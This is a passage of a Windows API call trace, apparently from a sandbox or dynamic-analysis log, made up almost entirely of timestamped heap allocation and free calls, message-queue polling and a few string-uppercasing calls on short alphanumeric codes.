RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0206.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0206.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0206.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0206.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0206.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0206.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0206.089] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0206.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0206.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0206.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0206.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0206.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0206.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0206.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0206.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0206.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0206.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0206.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0206.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0206.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0206.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0206.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0206.090] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0206.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0206.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0206.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0206.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0206.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0206.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0206.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0206.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0206.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0206.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0206.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0206.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0206.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0206.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0206.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0206.090] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0206.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0206.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0206.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0206.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0206.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0206.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0206.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0206.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0206.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0206.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0206.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0206.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0206.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0206.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0206.091] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0206.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0206.092] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0206.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0206.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9bd0 [0206.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0206.092] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0206.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0206.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0206.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0206.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0206.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0206.092] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0206.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0206.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0206.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0206.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0206.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0206.093] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0206.093] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0206.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0206.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0206.093] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0206.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0206.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f78 [0206.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0206.094] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0206.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0206.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0206.094] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0206.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0206.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0206.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0206.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0206.094] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0206.095] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0206.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0206.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0206.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0206.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0206.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0206.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0206.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0206.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0206.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0206.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0206.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0206.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0206.096] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0206.096] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0206.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0206.096] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0206.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0206.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f78 [0206.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0206.097] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0206.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0206.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0206.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0206.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0206.097] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0206.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0206.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0206.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0206.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0206.098] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0206.098] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0206.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0206.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0206.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0206.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0206.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0206.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.099] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0206.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0206.099] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0206.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0206.099] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0206.099] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0206.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0206.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0206.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0206.100] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0206.100] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0206.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0206.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0206.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 